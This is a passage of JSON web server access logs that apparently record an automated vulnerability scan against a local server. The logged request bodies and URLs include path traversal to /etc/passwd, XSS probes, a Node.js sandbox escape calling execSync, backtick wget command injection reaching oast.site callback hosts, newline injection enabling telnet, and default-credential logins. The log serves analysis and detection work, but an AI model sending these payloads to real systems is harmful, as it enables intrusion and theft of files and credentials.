+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/admin/pipelines/create?group=defaultGroup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/automerge.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=127.0.0.1%0A\x0D\x0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /images/..%2fapply_abstract.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mt.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F29K9NMhs6fDhq2yyXhVehaf583t.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/rss-functions.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apache-default/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"action=&token=`wget http://ca281d8smpvb9r2g07h0o9fzuqaziqthh.oast.site`&mode=`wget http://ca281d8smpvb9r2g07h0ohzozdshirc6d.oast.site`","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /storfs-asup HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adserver/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://attacker.com","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-post.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /UI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /getcfg.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"action=login&username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/docker.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/css/29K9NMhs6fDhq2yyXhVehaf583t.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"username=admin&password=geoserver","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /geoserver/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openx/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /app.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sso/XUI HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"aps=ca281d8smpvb9r2g07h0ii4taomwsyqbp.oast.site&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /AdminTools/querybuilder/logon?framework= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_fragment?_path=_controller=phpcredits&flag=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci-generated.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMUser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/database-backups/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /GallerySite/filesrc/fotoilan/388/middle//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"fullPath=/etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forum/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"op=login&username=admin|pwd&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /revive/www/delivery/lg.php?dest=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:14:39 